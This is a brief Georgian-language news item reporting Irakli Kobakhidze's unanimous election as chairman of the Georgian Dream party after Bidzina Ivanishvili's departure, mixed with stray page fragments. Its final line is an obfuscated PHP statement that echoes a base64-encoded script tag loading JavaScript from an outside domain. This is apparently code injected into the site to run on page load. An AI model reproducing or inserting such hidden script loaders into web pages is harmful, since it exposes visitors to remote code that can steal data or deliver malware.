celsiusi
ავერსი შნაიდერი
„ქართული ოცნების - დემოკრატიული საქართველოს“ თავმჯდომარედ პარტიის ყრილობაზე ერთხმად ირაკლი კობახიძე აირჩიეს.
 
„ქართული ოცნების" ყრილობას, რომელიც თბილისში ექსპო-ჯორჯიაში იმართება, მთელი ქვეყნის მასშტაბით 400-მდე დელეგატი ესწრება.
 
აღსანიშნავია, რომ „ქართული ოცნების“ თავმჯდომარის პოსტი მას შემდეგ გათავისუფლდა, რაც 11 იანვარს მისმა უკვე ყოფილმა თავმჯდომარე ბიძინა ივანიშვილმა თანამდებობა დატოვა და პოლიტიკიდან წასვლის შესახებ განაცხადა.
 
ცნობისთვის, ირაკლი კობახიძე პარტია "ქართული ოცნება - დემოკრატიული საქართველოს" რიგით მეოთხე თავმჯდომარეა. მანამდე ამ პოზიციას 2-ჯერ თავად ბიძინა ივანიშვილი, ხოლო თითო-თითოჯერ ირაკლი ღარიბაშვილი და გიორგი კვირიკაშვილი იკავებდნენ.
1566
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");